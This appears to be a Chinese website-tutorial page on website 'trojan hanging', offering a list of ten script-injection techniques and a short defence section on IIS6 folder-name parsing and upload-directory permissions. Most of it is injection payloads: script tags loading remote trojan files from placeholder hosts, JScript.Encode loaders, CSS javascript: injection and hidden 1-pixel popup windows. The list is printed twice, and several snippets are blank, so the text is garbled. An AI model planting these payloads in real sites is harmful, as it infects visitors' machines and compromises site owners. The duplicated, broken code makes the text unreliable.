• 微软原版系统

  • 一键重装系统

  • 纯净系统

  • 在线技术客服

魔法猪系统重装大师 一键在线制作启动 U 盘 PE 系统 用一键重装的魔法拯救失去灵魂的系统
当前位置:首页 > 教程 > 电脑教程

怎样防止网站被挂马?挂马代码大全

时间:2015年04月02日 15:15:34    来源:魔法猪系统重装大师官网    人气:3263

如何防止网站被挂马?挂马代码大全 做网站的人知道也不小心网站就被黑客挂了木马那个头痛呀!首先引起了网友的反感。从些不在上自己的网站。搜索还惩罚,真是倒霉呀。下面我们就了解一下,网站是
如何防止网站被挂马?挂马代码大全
做网站的人知道也不小心网站就被黑客挂了木马那个头痛呀!首先引起了网友的反感。从些不在上自己的网站。搜索还惩罚,真是倒霉呀。下面我们就了解一下,网站是如何中毒的。
一:框架挂马

二:js文件挂马
首先将以下代码
document.write(“”);
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<script language=“JScript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀     电脑知识
四:body挂马

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + ' ';
六:css中挂马
body {
background-image: url('javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}
七:JAJA挂马
<script language=javascript>
window.open (“地址”,“”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”);
</script>
八:图片伪装




九:伪装调用:




十:高级欺骗
页面要显示的内容
<script Language=“JavaScript”>
function www_163_com ()
{
var url=“网马地址”;
open(url,“NewWindow”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10”);
}
</script>
如何防止网站被挂马
A。为什么好好的网站会有木马?
一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以“海阳顶端网ASP木马”较为流行。
因2003平台IIS6原因,也存在目录名问题引起ASP木马。( 微软的IIS 6存在严重解析文件名错误
测试办法:在FTP中建立一个 test.asp 的文件夹,文件夹名就是 test.asp ,在这个文件夹中上传一个 hack.jpg,这个jpg的内容可以直接是,然后,用IE远程访问这个hack.jpg,你可以发现,它一样被当作是ASP文件来运行!显然,只要你的网站程序,允许用户自己建立文件夹及上传图片,黑客就可以上传图片来当作ASP木马来运行。
解决办法:所有使用星外虚拟主机管理平台的虚拟主机用户,可以在主机面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限,就可以解决这个问题。
可以参考其他公司的同类公告:
http://www.powereasy.net/Announce/3004.html(动易)
大家常用的动易2006和动网,BLOG这类的程序,需要详细的检查一下,并跟着开发者进行相应的安全程序升级。这样才能减少因代码原因引起的网站被黑。
目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入
二:js文件挂马
首先将以下代码
document.write(“”);
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<script language=“JScript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + ' ';
六:css中挂马
body {
background-image: url('javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}
七:JAJA挂马
<script language=javascript>
window.open (“地址”,“”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”);
</script>
八:图片伪装




九:伪装调用:




十:高级欺骗
页面要显示的内容
<script Language=“JavaScript”>
function www_163_com ()  电脑知识
{
var url=“网马地址”;
open(url,“NewWindow”,“toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10”);
}
</script>

怎样,防止,网站,被,挂马,代码,大全,如何,防止,
栏目:电脑教程 阅读:1000 2023/12/27
Win7教程 更多>>
U盘教程 更多>>
Win10教程 更多>>
魔法猪学院 更多>>

Copyright © 2015-2023 魔法猪 魔法猪系统重装大师

本站发布的系统仅为个人学习测试使用,请在下载后24小时内删除,不得用于任何商业用途,否则后果自负,请支持购买微软正版软件。

在线客服 查看微信 返回顶部